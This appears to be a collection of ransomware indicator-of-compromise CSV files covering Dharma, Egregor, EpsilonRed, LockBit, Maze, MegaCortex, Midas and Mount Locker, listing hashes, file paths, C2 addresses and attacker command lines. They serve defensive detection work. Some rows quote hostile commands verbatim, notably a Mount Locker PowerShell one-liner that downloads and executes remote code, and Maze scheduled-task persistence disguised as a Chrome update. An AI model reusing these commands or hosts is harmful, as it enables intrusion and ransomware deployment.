| file_name,Delete-AVServices.ps1,PowerShell kills services and runs uninstall on AV services, 34 | file_name,appWiz.ps1,Dharma script to automate application removal wizard, 35 | file_name,Disable-WinDefend.ps1,Dharma script to disable Windows Defender, 36 | 
file_name,purgeMemory.ps1,Shadow copy deletion and other tasks associated with Dharma execution, 37 | file_name,winhostok.ps1,, 38 | file_name,NetPC.ps1,Dharma script to harvest PC names from network, 39 | file_name,NetSubPC.ps1,Dharma script to harvest PC names from subnets on local network, 40 | file_name,NetADPC.ps1,Dharma script to harvest PC names from Active Directory, 41 | file_name,GetHosts.ps1,Dharma script to use WMI to find hostnames, 42 | file_name,adbrute.ps1,Dharma Active Directory account brute force script, 43 | file_name,2sys.ps1,, 44 | file_name,wallet.ps1,, 45 | file_name,toolbelt1.ps1,Secondary Dharma control script, 46 | file_name,Start-Tor.ps1,, 47 | file_name,Email-Screenshot.ps1,Dharma script to exfiltrate system data by emailing screenshots, 48 | file_name,rdpv.exe,Nirsoft RDP password viewer, 49 | file_name,takeaway.exe , RarSFX carrying Dharma payload, 50 | file_name,winhost.exe,Dharma ransomware, 51 | file_name,purgememory.ps1,, 52 | file_name,ns2.exe,Dharma network scanner, 53 | file_name,bulletspassview.chm,Nirsoft password viewer, 54 | file_name,bulletspassview.exe,Nirsoft password viewer, 55 | file_name,chromepass.cfg,Nirsoft password viewer, 56 | file_name,chromepass.chm,Nirsoft password viewer, 57 | file_name,chromepass.exe,Nirsoft password viewer, 58 | file_name,dialupass.chm,Nirsoft password viewer, 59 | file_name,dialupass.exe,Nirsoft password viewer, 60 | file_name,iepv.chm,Nirsoft password viewer, 61 | file_name,iepv.exe,Nirsoft password viewer, 62 | file_name,mailpv.chm,Nirsoft password viewer, 63 | file_name,mailpv.exe,Nirsoft password viewer, 64 | file_name,mspass.cfg,Nirsoft password viewer, 65 | file_name,mspass.chm,Nirsoft password viewer, 66 | file_name,mspass.exe,Nirsoft password viewer, 67 | file_name,netpass.cfg,Nirsoft password viewer, 68 | file_name,netpass.chm,Nirsoft password viewer, 69 | file_name,netpass.exe,Nirsoft password viewer, 70 | file_name,passwordfox.chm,Nirsoft password viewer, 71 | 
file_name,passwordfox.exe,Nirsoft password viewer, 72 | file_name,pstpassword.chm,Nirsoft password viewer, 73 | file_name,pstpassword.exe,Nirsoft password viewer, 74 | file_name,routerpassview.cfg,Nirsoft password viewer, 75 | file_name,routerpassview.chm,Nirsoft password viewer, 76 | file_name,routerpassview.exe,Nirsoft password viewer, 77 | file_name,sniffpass.cfg,Nirsoft password viewer, 78 | file_name,sniffpass.chm,Nirsoft password viewer, 79 | file_name,sniffpass.exe,Nirsoft password viewer, 80 | file_name,webbrowserpassview.cfg,Nirsoft password viewer, 81 | file_name,webbrowserpassview.chm,Nirsoft password viewer, 82 | file_name,webbrowserpassview.exe,Nirsoft password viewer, 83 | file_name,wirelesskeyview.chm,Nirsoft password viewer, 84 | file_name,wirelesskeyview.exe,Nirsoft password viewer, 85 | file_name,javsecc.exe,Dharma AutoIT container for Tor relay, 86 | ip,185.20.187.20,Host storing some of Dharma RaaS files, 87 | sha1,b7dc961e4485c967f43f1be6fbbe067a81cc2181,takeaway.exe, 88 | sha1,23ef76d2e4cec624821c9ca087376c2a4584db45,takeaway.exe, 89 | sha1,4576efe2b713b1fd1a967b9beec57bf66a6cdbf8,takeaway.exe, 90 | sha1,e5f3330884a48c5fa462e0299f4bff261b4dbc80,takeaway.exe, 91 | sha1,15d4894e73dfe5f63061462a1bf6a9b5976457c2,takeaway.exe, 92 | sha1,6fb1fb1641c1faf65b5d7c786b7ea0df0be14b4b,takeaway.exe, 93 | sha1,1eea0f017bffa0a868605f373efa74b4858e1c37,takeaway.exe, 94 | sha1,629c9649ced38fd815124221b80c9d9c59a85e74 ,NS2.ex, 95 | sha1,5adfa3cc0480795406f69170f9fcf2b34a5984e3 ,purgeMemory.ps1, 96 | sha1,5ac57e3d0e94e87f9ed14a7351c770932c4b7d08, takeaway.ps1, 97 | sha1,55e1e325d3849dff0daf50bf330ce28155ab7e51 ,winhost.ex, 98 | sha256,1cec5e4563e2c1570353e54a4ecc12ab4d896ab7227fd8651adcd56b884c0c1c,GdAgentSrv.de.dll, 99 | sha256,28042dd4a92a0033b8f1d419b9e989c5b8e32d1d2d881f5c8251d58ce35b9063,Process Hacker, 100 | -------------------------------------------------------------------------------- /Ransomware-Egregor.csv: 
-------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs of Egregor attacks, 3 | sha1,695b506c07779ba0e543fabfd63752c0ac44a13d,Egregor ransomware detected as Mal/Sekhmet-A and Troj/Ransom-GCN 4 | sha1,d8cbce281626bb5c14f59a979e243e6b260363ba,"SystemBC, detected as Mal/EncPk-APV" 5 | sha1,59ca484e8d766ec7980d6c2a297b4d401dc386f5,"Cobalt Strike payload, detected as ATK/Cobalt-P" 6 | sha1,f73e31d11f462f522a883c8f8f06d44f8d3e2f01,Egregor ransomware detected as Troj/Ransom-GCG 7 | sha1,bd8c52bb1f5c034f11f3048e2ed89b7b8ff39261,"Egregor ransomware variant, detected as Troj/Agent-BFPD and Troj/Ransom-GCT" 8 | sha1,c3467862e0e410ad2eb72cb3d810199499db017d,Mal/QbotVbs-A (Qbot) detected concurrently with Egregor 9 | filepath,C:\perflogs\clang.dll,Drop point for Egregor in Cobalt Strike attack 10 | command_line_parameter,"rundll32.exe  C:\Windows\sed.dll,DllRegisterServer -passegregor1313 --full",Egregor execution command line 11 | command_line_parameter,"rundll32.exe  C:\Windows\sed.dll,DllRegisterServer -passegregor1313 --full",Egregor execution command line 12 | command_line_parameter,"C:\WINDOWS\system32\cmd.exe /c """"e.bat"" -passegregor1313""",Egregor execution command line 13 | command_line_parameter,"rundll32.exe C:\perflogs\clang.dll,DllRegisterServer -peguard6",Egregor execution command line -------------------------------------------------------------------------------- /Ransomware-EpsilonRed.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from https://news.sophos.com/en-us/2021/05/28/epsilonred/, 3 | sha256,57EE78299598170C766FF73CEFCA9E78B9B81AC6999E8ADB61903BC89BE313BA,red.ps1 4 | sha256,7259975D7E3B3D9D059A38F4393AB920764B46CA243E192E08F7699999382E07,RED.7z archive (contains all subsequent files) 5 | sha256,172BBF46E5F46DD7A9EA0C22054B644F60EFC3A9AD26A6F0E95CA57E38AF60A7,1.ps1 file 6 | 
sha256,9845619CB9C3612055A934C4270568391832EAB40A66DBB22B1B37FA05559C92,2.ps1 file 7 | sha256,5120998FA1482D4D0D0099D91AAB2AF647C0272819D7DCF792EEC01C77AB9391,3.ps1 file 8 | sha256,4D6272AEADF7FC131AC126DC07D7BFD2E878D359E5E7BB5376A67295CE05FC15,4.ps1 file 9 | sha256,0794C8630F40F04C0E7CEA40F11DC3F1A829A3BE69852FE9E184AA8B7ED20797,5.ps1 file 10 | sha256,7A8128F8788524E54A69619B69870DFD4C50DB46E3EB786899F7275DAB73D2D9,6.ps1 file 11 | sha256,4EAF5E93953756BC2196BFCFB030B6EAAD687FA1E8DB9F47B09819F3B4315230,7.ps1 file 12 | sha256,8C294F1EF05DF823460BD11CE34EA7860178DE6BC3D9B0127A3B9C08CF62437F,8.ps1 file 13 | sha256,A9A6D35469E471666758ED5D1174EDC5B650C0ACB2C351213EADFB408F74BDCB,9.ps1 file 14 | sha256,039DA6B099303FDFD087BB7DF94012780DFE375C67234CE495C78CF2DCF7FD9D,10.ps1 file 15 | sha256,699FFB898864BF804CF726F39B5E8168D55E44FC1584B71BA25E31B43AE543E8,11.ps1 file 16 | sha256,EE10F3A798AAA03F4CED2DDB28D2B36FE415EA2CBBD9C3B97B2A230A72D77F5C,12.ps1 file 17 | sha256,C1F963ABA616680E611601E446955E9552C69DB23DABAB8444718D82AD830029,C.ps1 file 18 | sha256,5AA7DE7EAB570522C93D337D395396057033AD6596DB4A0BDA15D77A6D4C6C3A,S.ps1 file 19 | sha256,84755B2177B72364918F18C62A23854E7A8A66C4F5005CC040357850ADF9D811,P.exe 20 | sha256,ce5ba1e5d70d95d52b89a1b8278ff8dd4d1e25c38c90ca202b43bdc014795d78,rutserv.exe (Remote Utilities installer) 21 | sha256,35ffc1263005fd0a954deed20a7fb0cd53dbab6bb17ff8bd34559a5a124686c7,rutserv.exe (Remote Utilities installer) 22 | domain,epsilons[.]red, 23 | info,https://j.mp/epsilonred-cleanup,CyberChef recipe to render the PowerShell readable to humans 24 | -------------------------------------------------------------------------------- /Ransomware-LockBit.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Files from the Lockbit ransomware report,https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets/ 3 | 
file_path_name,C:\Windows\System32\CloudBAK.exe,Renamed PowerShell.exe 4 | file_path_name,C:\Windows\System32\defrag32.exe,Renamed PowerShell.exe 5 | file_path_name,C:\Windows\System32\diagnosticMem.exe,Renamed PowerShell.exe 6 | file_path_name,C:\Windows\System32\Ras.exe,Renamed PowerShell.exe 7 | file_path_name,C:\Windows\System32\wermgupd.exe,Renamed PowerShell.exe 8 | file_path_name,C:\Windows\System32\wermreport.exe,Renamed PowerShell.exe 9 | filename,1_Remote Desktop Connectio~.lnk ,LNK file for backdoor persistence 10 | filename,Remote Desktop Connection.lnk,Mal/PowLnkObf-A LNK file for backdoor persistence 11 | ip,142.91.170.175,LockBit persistent backdoor downloader 12 | ip,142.91.170.6,LockBit backdoor C&C 13 | sha256,0b6cb591f1a0db7d74d8e802000fce9a61bfe520922eefbad1166d1f7c13d222,LNK file for backdoor persistence 14 | sha256,397138156bb09696045398ca709bcaa73e0fe7cc48be9b6654f29bce0c535015,Log obfuscation data for LockBit 15 | sha256,4250172289cf5e82f5decd7b72d3455538faf7dc26c97abfcfa243aae2a66d8e,LockBit Task Scheduler data file 16 | sha256,443cd5c871a7e0e75284c10c279a9d19156c44d2a038f35c3abd83ecd52cb14c,Mal/PSDL-J PowerShell 17 | sha256,49614c9b05cceea11c341e790283ee75606bd304dc0c9899a1d4a036bda33f8a,Mal/PowLnkObf-A LNK file for backdoor persistence 18 | sha256,560f5444461de30e9b2f00a8cb37f4c6d736bb35cc9fb85894b198c59508cde7,Log obfuscation data for LockBit 19 | sha256,5819b1d4ee001e387223a7a6fc1ad4a476e45ccd75b354932108073985c05b95,LockBit PowerShell backdoor 20 | sha256,af5511fd2bfda3970d7ed82d0138ff9388f17f55fcfbbee0ee37e9608c91bb65,LockBit PowerShell backdoor 21 | sha256,e6f11f2dd14c5fde7695a3b6185fbeb1bfc7376ad58597d6969c0307585858b0,Log obfuscation data for LockBit 22 | sha256,ff61e09fbd4515297004a025b0ef1d502548a9f4a1ba3bf25ebfb93ac18fbf27,Mal/PSDL-J PowerShell 23 | url,https://docs.google.com/spreadsheets/d/11C7pdR3r_VeOPQXpRCGtUEJoftKO1wB7ZFfX0t94XTw/edit#gid=0&range=B1,LockBit backdoor installer loader URL 24 | 
-------------------------------------------------------------------------------- /Ransomware-Lockbit3-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Lockbit 3.0 ransomware,https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling 3 | sha256,0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509,Troj/Lockbit-F 4 | sha256,168ab5ce440d53ca7397cf3da86d68a67264c6bb0e3f6c8f2066132d6d129bdd,c:\logs\lbb_rundll32_pass.dll. This file was not retrieved from the target and is not available on VT 5 | sha256,18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566,c:\users\\downloads\netscan\netscan.exe : 6 | sha256,2308cef810b30ccb5be11fc664ce51b41bb6cee703f09d0a348771cf11f4dc9e,c:\users\\desktop\avremover_nt64_enu.exe : 7 | sha256,307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59,c:\users\\desktop\backstab64.exe : 8 | sha256,33987ca88cf48f7f9cfd46610f2c46e104f7c13f0285b5c6c2dca2c6290d9df5,Mal/FakeAV-JC 9 | sha256,35f971f9f84af8f4a42c97d6258c251e213f99741c1cfadfabbd5f1204e5658e,Mal/FakeAV-JC 10 | sha256,372d6d866798495d12b0ce745038fa2da575f22c30b061b948804cfdd8d11224,ML/PE-A + W32/Neshta-D (Gmer infected with Neshta) 11 | sha256,391a97a2fe6beb675fe350eb3ca0bc3a995fda43d02a7a6046cd48f042052de5,Troj/Lockbit-F 12 | sha256,39c363d01fb5cd0ed3eeb17ca47be0280d93a07dda9bc0236a0f11b20ed95b4c,Mal/FakeAV-JC 13 | sha256,4f61f20fa1edfd0ce1de2ca8110c725c9d9c16a9680748c12042a3302054fc72,GMER 14 | sha256,5043e94612cc5111c07f30968e7bc78e96e277f55262064207a9cd87bc23a343,Troj/Lockbit-F 15 | sha256,506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51,c:\users\\downloads\lbb_pass.exe : Lockbit executable 16 | sha256,7d58338f7e5b4b77459835a2e057a07f81f72991a0e282d079fd5e227f68b5de,ardrv.sys 17 | sha256,80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce,Troj/Lockbit-F 18 | 
sha256,8834c84cfd7e086f74a2ffa5b14ced2c039d78feda4bad610aba1c6bb4a6ce7f,c:\users\\downloads\netscan\sd.exe : (creates snapshot of the filesystem) 19 | sha256,90235e199dcb2cd6fa2e68fbfc46f1aa649f2438210fd833b8e7e748b6428ba4,Troj/Lockbit-F 20 | sha256,986a88c4053d398624c7736a5f60d2561760b7a532677fc251c8c3dac8f3f60e,OPSWAT OESIS V4 Removal Module (https://www.opswat.com/products/oesis-framework) 21 | sha256,9a34909703d679b590d316eb403e12e26f73c8e479812f1d346dcba47b44bc6e,Mal/FakeAV-JC 22 | sha256,a56b41a6023f828cccaaef470874571d169fdb8f683a75edd430fbd31a2c3f6e,Troj/Lockbit-F 23 | sha256,c6861032317562532c21e373b88efacdc1307c8a3efce8c8992584171157ebed,Troj/Lockbit-F 24 | sha256,c6cf5fd8f71abaf5645b8423f404183b3dea180b69080f53b9678500bab6f0de,Troj/Lockbit-F 25 | sha256,d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee,Troj/Lockbit-F 26 | sha256,e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173,GMER 27 | sha256,f4ab473dcb45beb8cb01ad616422c05a45134c6b028f310f06543e2c33584cef,Troj/Lockbit-F 28 | sha256,fd98e75b65d992e0ccc64e512e4e3e78cb2e08ed28de755c2b192e0b7652c80a,Troj/Lockbit-F 29 | file_path_name,c:\logs\lbb_rundll32_pass.dll,168ab5ce440d53ca7397cf3da86d68a67264c6bb0e3f6c8f2066132d6d129bdd. 
This file was not retrieved from the target and is not available on VT 30 | file_path_name,c:\logs\lbb_ps1_obfuscated.ps1, 31 | file_path_name,c:\logs\lbb_ps1_pass.ps1, 32 | file_path_name,c:\logs\lbb_pass.exe,506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51 33 | file_path_name,c:\logs\avremover_nt64_enu.exe,2308cef810b30ccb5be11fc664ce51b41bb6cee703f09d0a348771cf11f4dc9e 34 | file_path_name,c:\logs\backstab_x64.exe, 35 | file_path_name,c:\logs\backstab_x86.exe, 36 | file_path_name,c:\logs\gmer3.exe, 37 | file_path_name,c:\logs\gmer2.exe, 38 | file_path_name,c:\logs\backstab64.exe,307eb30c7d3640ca11f564b1dbbb7a133236c3c9b45192ddcb317477a9f54b59 39 | file_path_name,c:\logs\gomer.exe, 40 | file_path_name,c:\desktopcentral\lbb___.zip, 41 | file_path_name,c:\desktopcentral\psp.ps1, 42 | file_path_name,c:\desktopcentral\ps.ps1, 43 | file_path_name,c:\users\\downloads\gmer.exe, 44 | file_path_name,c:\users\\downloads\sophos-removal-tool-master.zip, 45 | file_path_name,c:\users\\downloads\sophoscentralremoval-master.zip, 46 | file_path_name,c:\users\\downloads\uninstallscript.ps1, 47 | file_path_name,c:\users\\downloads\netscan\zam.bat, 48 | file_path_name,c:\users\\downloads\netscan\uninstallsophos.bat, 49 | file_path_name,c:\users\\downloads\netscan\turnoff.bat, 50 | file_path_name,c:\users\\downloads\netscan\netscan.exe,18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566 51 | -------------------------------------------------------------------------------- /Ransomware-Maze.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note, 2 | Description,Indicators for Maze ransomware,https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique, 3 | command_line,cmd.exe /c c:\programdata\3.bat,,591d08c34b2d6945b39798a836f2cbaa9af7e8573df9de82038cfe0bef728255 4 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\Documents and Settings"" ""C:\Documents 
and Settings""",,6e742521a05a30c256bb5aa3a83e317132230c84e205aef9b200dbf1d1d52ac4 5 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\Program files (x86)"" ""C:\Program files (x86)""",,5b579e53f60a2f5dcf1d29fd23a86d6efe3aba784f95165e1618db1ee1ace425 6 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\Program files"" ""C:\Program files""",,f56775b2bc86a692982b0013e1d3ed5445db708ebbb0e70001b9e6df1dfbd193 7 | command_line,"cmd.exe /C mklink /j ""C:\SDRSMLINK\System Volume Information"" ""C:\System Volume Information""",, 8 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\$Recycle.Bin C:\$Recycle.Bin,,ed3d476caf7a5f6c80e5dccc9861c5af854fc185124064a33c1cadc8ba9e4367 9 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Config.Msi C:\Config.Msi,, 10 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\ProgramData C:\ProgramData,, 11 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Recovery C:\Recovery,, 12 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Restore C:\Restore,, 13 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\StorageReports C:\StorageReports,, 14 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\TEMP C:\TEMP,, 15 | command_line,cmd.exe /C mklink /j C:\SDRSMLINK\Users C:\Users,, 16 | command_line,cmd.exe /C mklink C:\SDRSMLINK\DECRYPT-fileS.txt C:\DECRYPT-fileS.txt,, 17 | command_line_parameter,enc.exe --logging,, 18 | command_line_parameter,enc6.exe --logging,, 19 | command_line_parameter,regsvr32.exe /i c:\programdata\network.dll,, 20 | command_line_parameter,[cmd /c msiexec /qn /i \\[compromised-server-name]\frs\pikujuwusewa.msi],, 21 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxHeadless.exe --startvm micro -v off,, 22 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe /reregserver,, 23 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe /unregserver,, 24 | command_line_parameter,C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe -Embedding,, 25 | 
command_line_parameter,"cmd /c SCHTASKS /s [ip-address-of-target] /RU ""SYSTEM"" /create /tn ""Google Chrome Security Update"" /tr ""c:\programdata\license.exe"" /sc ONCE /sd 01/01/1910 /st 00:00 /f",, 26 | command_line_parameter,"cmd /c SCHTASKS /s [ip-address-of-target] /run /TN ""Google Chrome Security Update""",, 27 | command_line_parameter,"cmd.exe /C ""C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe"" /reregserver",, 28 | command_line_parameter,"cmd.exe /C ""C:\Program files (x86)\pikujuwusewa\app64\VBoxSVC.exe"" /unregserver",, 29 | command_line_parameter,"cmd.exe /C ""C:\Program files (x86)\pikujuwusewa\starter.bat""",, 30 | command_line_parameter,"cmd.exe /C regsvr32 /S /U ""C:\Program files (x86)\pikujuwusewa\app64\VBoxC.dll""",, 31 | command_line_parameter,"regsvr32 /S ""C:\Program files (x86)\pikujuwusewa\app64\VBoxC.dll""",, 32 | command_line_parameter,"regsvr32 /S /U ""C:\Program files (x86)\pikujuwusewa\app64\VBoxC.dll""",, 33 | command_line_parameter,regsvr32.exe /i c:\programdata\network.dll --nomutex,, 34 | file,(hash not available),C:\programdata\license.exe, 35 | file,0df95fe05e4c6dbe7fd1cf4221ab3bf053761027cd496ac0a84eb435080245e9,vrun.exe, 36 | file,52b13207e6464a7fd57b02c3c4525339e91e60348e5a9e5d03f2b6faf117c82b,payload (.dll), 37 | file,591d08c34b2d6945b39798a836f2cbaa9af7e8573df9de82038cfe0bef728255 ,C:\ProgramData\enc6.exe, 38 | file,5b579e53f60a2f5dcf1d29fd23a86d6efe3aba784f95165e1618db1ee1ace425,C:\ProgramData\msinfo64.exe (meterpreter), 39 | file,6279e93c1ad63991b95dfd3775581835ec76f8b19a3c2947365d28736dd5741a,micro.vdi, 40 | file,6e742521a05a30c256bb5aa3a83e317132230c84e205aef9b200dbf1d1d52ac4,C:\ProgramData\enc.exe , 41 | file,7ee403ca56a0bd609ff8eb9f9c893eb06456be283e0c3a0feeda15fd32173742,C:\programdata\network.dll , 42 | file,dfb416add0a8d67800832863ab932cf3991424846a21de5dfff9de38e3df3c4f,preload.bat , 43 | file,f56775b2bc86a692982b0013e1d3ed5445db708ebbb0e70001b9e6df1dfbd193,C:\ProgramData\msinfo32.exe (Cobalt Strike), 44 | 
file,f9eb9b611e49910e4fabd56379fc6142ac51f2b7d1e0c82b9ca7f37ee5df43ac,pikujuwusewa.msi, 45 | ip_port,94.232.40.167:9338,Russia C2 - hxxps://dev.metasploit.com, 46 | registry_path_key_value,HKCU\SOFTWARE\LmuSMJdqtVATql /v uDyiciWrann /t REG_DWORD /d 2365,, 47 | scheduled_task_path,Windows Update Security Patches,C:\programdata\enc.exe / C:\programdata\enc6.exe , 48 | scheduled_task_path,Windows Update Security Patches 5,C:\programdata\enc.exe / C:\programdata\enc6.exe, 49 | scheduled_task_path,Windows Update Security ,regsvr32.exe /i c:\programdata\network.dll, 50 | scheduled_task_path,Google Chrome Security Update ,C:\programdata\license.exe, 51 | scheduled_task_path,Windows Update Security Patches 2 ,C:\programdata\enc.exe / C:\programdata\enc6.exe, 52 | url,94.232.40.167:9338/dot.gif,, 53 | url,94.232.40.167:9338/visit.js,, 54 | -------------------------------------------------------------------------------- /Ransomware-MegaCortex: -------------------------------------------------------------------------------- 1 | File hashes: 2 | MegaCortex: 3 | 478dc5a5f934c62a9246f7d1fc275868f568bc07 4 | 81bb640d960fd68869a569f40835447971e7b235 5 | 9b7105dd54c009844c31cd2320a407637c527a3a 6 | 9bdf5448971b6ee148cbbed8398f99b88839fcf8 7 | a5177bb1c60c716c67bc4fec2524b332979a8bba 8 | ae54575ab8e0024c1444e84a97bbd239706d3ded 9 | ba79b583b6a35dd38f25afd28055cce1835fffd3 10 | f48b41e4356d6a35cef36ef6153755d8d2ec3f0b 11 | 12 | Cobalt Strike reflexive loader: 13 | 6544e16c316e4700e9271deb31242edf600599c7 14 | 6ca2f90a579d995c334ab1fbfbcbe1199507ad45 15 | 7772c87601440e93c6d990f4ee31eed314e9c20d 16 | 80fcdf1201299dec71163c28e232e826eb7e580f 17 | 851468365a19bcebeaf05091547ada838009c0d6 18 | bed9e0bed8a10bc5a065e106ed51fe2710b3ede8 19 | d4b0a1fcfa64312f30f710f11c22b8f1ecc8a981 20 | de07ddc179f7b55f16f7023c0d82aefabd1426c5 21 | fe4e836e635c72ea435b0ff66bc3d487ca2aaa72 22 | 0ce8fcc43f001cff54408bb1c2895880cb900f7c 23 | 0dfa89d5d26d5269d3282907e3799224c9958af4 24 | 
2bb0c3607a445d0c08b1a727d466a66843d4f449 25 | 411a0dec716c15e63dca2645c97afb5af8bc9e1a 26 | 7fc295772f9edd5edcb0f5a49e440c8f1bf95e7b 27 | 82c3f0a7a319bee0bfa20df92f8ed791930bac90 28 | 94275573efe6494874f048ce720836b847df3444 29 | bd71e9e0285ef2846fa2cecac9ff60826b002ce6 30 | d764cc88e979f7eff45765994ea68613038facf2 31 | edbd27610b7449c4cf2bb63f65c92ffcfb401627 32 | 5d32dab9dd235618a3767c38513c920fab0cf8d5 33 | 85e51a0ddd93eaf3a2604e603ce643d17a55dfa1 34 | 35 | Cobalt Strike Meterpreter shells: 36 | 31af48e1e61d85965fd3f4719306a3993550d7e7 37 | afa7575bf763cf312cbd420bfae50d331729cbfc 38 | e7223ac9968ecf707cc7cca10088ae9a9adec522 39 | 2849626522a45673a191265c245f934b91020e1c 40 | 41 | Other: 42 | 2f40abbb4f78e77745f0e657a19903fc953cc664 43 | 44 | Certificates: 45 | 46 | 3AN LIMITED 47 | Status Valid 48 | Issuer thawte SHA256 Code Signing CA 49 | Valid from 12:00 AM 03/15/2019 50 | Valid to 11:59 PM 03/14/2020 51 | Valid usage Code Signing 52 | Algorithm sha256RSA 53 | Thumbprint 60974F5CC654E6F6C0A7332A9733E42F19186FBB 54 | Serial number 04 C7 CD CC 16 98 E2 5B 49 3E B4 33 8D 5E 2F 8B 55 | 56 | PRO-STO, TOV 57 | Status Trust for this certificate or one of the certificates in the certificate chain has been revoked. 
58 | Issuer Sectigo RSA Code Signing CA 59 | Valid from 01:00 AM 03/01/2019 60 | Valid to 12:59 AM 03/01/2020 61 | Valid usage Code Signing 62 | Algorithm sha256RSA 63 | Thumbprint 3B3BA7DAAA011A33447E607FCD178BE6FBE190BE 64 | Serial number 00 CA 0E 70 90 D4 82 70 04 C9 9A F2 FC 7D 73 3C 02 65 | -------------------------------------------------------------------------------- /Ransomware-Midas.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Midas ransomware, 3 | sha-256,fe5e26ee2e15cbc10970fc3f0d249b02bbbc79b8dbc7adbd41340f3c0a4afd8d,"legitimate, benign dism.exe abused to load dismcore.dll" 4 | sha-256,3d779d02a0c7061caa8b412119a27b39692f3ecba80aa5e070434b95cf24b436,dismcore.dll Troj/MSIL-SDB 5 | sha-256,4823f478e5fb68be06ba987539c3e1c52e2597b0b35edc5b66fcedcef66fb1f6 ,encrypted form of https://github.com/monoxgas/sRDI (detected as ATK/sRDI-A) 6 | sha-256,0d43eca3777f98773314e04870bcbe76d6c5eb0694356509cd9f698d9a169f76,Harmony Loader (reflective loader decrypted during the attack) 7 | sha-256,de58d52374108d5ee8bd12b09034d4fa15ea5789b191e64ed1a559915ea393e8,example batch file used to start dism.exe (contains randomized path name) 8 | sha-256,73d62f5989336da3809c150861bac08c13547a9992181fec1c51741b53aeb2f3,example vbs script used to start batch file (contains randomized path name) 9 | IP,5.34.178.211,c2 address used by threat actors 10 | IP,185.16.40.78,c2 address used by threat actors 11 | file_path,c:\users\public\videos,Multiple PowerShell scripts run from this location on infected machines 12 | filename,lz_els.ps1,Run from c:\users\public\videos 13 | filename,adtest.ps1,Run from c:\users\public\videos 14 | filename,dism_els.ps1,Run from c:\users\public\videos 15 | filename,out32.ps1,Run from c:\users\public\videos 16 | -------------------------------------------------------------------------------- /Ransomware-MountLocker.csv: 
-------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Mount Locker ransomware,https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/ 3 | command,"C:\Windows\system32\cmd.exe"" /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://supercombinating[.]com:80/bug3')) ", 4 | command,"regsvr32 yesc64.dll /i:""/log:c"" ", 5 | command,"regsvr32  locker_64.dll /i:""/log:c"" ", 6 | command,regsvr32.exe /i c:\Users\\Music\archs64.dll , 7 | command,"regsvr32.exe /s ""C:\Users\\AppData\Local\Temp\diloay.dll"" ", 8 | domain,104.244.42.129 ,C2 server 9 | domain,139.60.162.19 ,C2 server 10 | domain,143.110.185.84 ,C2 server 11 | domain,185.162.235.61 ,C2 server 12 | domain,206.189.56.140 ,C2 server 13 | domain,31.13.93.174 ,C2 server 14 | domain,31.13.93.35 ,C2 server 15 | domain,52.204.190.157 ,C2 server 16 | domain,felpojdhf8980.cyou ,C2 server 17 | domain,supercombinating.com ,C2 server 18 | filename,Keatuxnf.dll ,Cobalt Strike 19 | filename,locker_64.dll,Mount Locker ransomware 20 | filename,niicok.dll,Cobalt Strike 21 | filename,RecoveryManual.html,Ransom note  22 | filepath,C:\inetpub\locker_64.dll,Mount Locker ransomware  23 | filepath,C:\Users\\AppData\Local\Temp\diloay.dll,Cobalt Strike 24 | filepath,C:\Users\\AppData\Local\Temp\miavan32.dll,Cobalt Strike 25 | filepath,C:\Users\\Music\x64\mimikatz.exe,Mimikatz  26 | filepath,C:\Users\\yesc64.dll,Mount Locker ransomware  27 | filepath,C:\Windows\ar664hs.dll,Cobalt Strike 28 | filepath,C:\windows\locker_64.dll,Mount Locker ransomware  29 | filepath,C:\Windows\SysWOW64\exploer.exe,Cobalt Strike 30 | scheduled task,C:\Users\\AppData\Local\Google\Chrome\User Data\FileTypePolicies\archs64.dll,Name: updater  31 | scheduled task,regsvr32.exe /i c:\Users\\Music\archs64.dll,Name: regsvr32 32 | scheduled task,regsvr32.exe C:\Users\\Music\archs64 regsvr32.exe /i ,Name: 
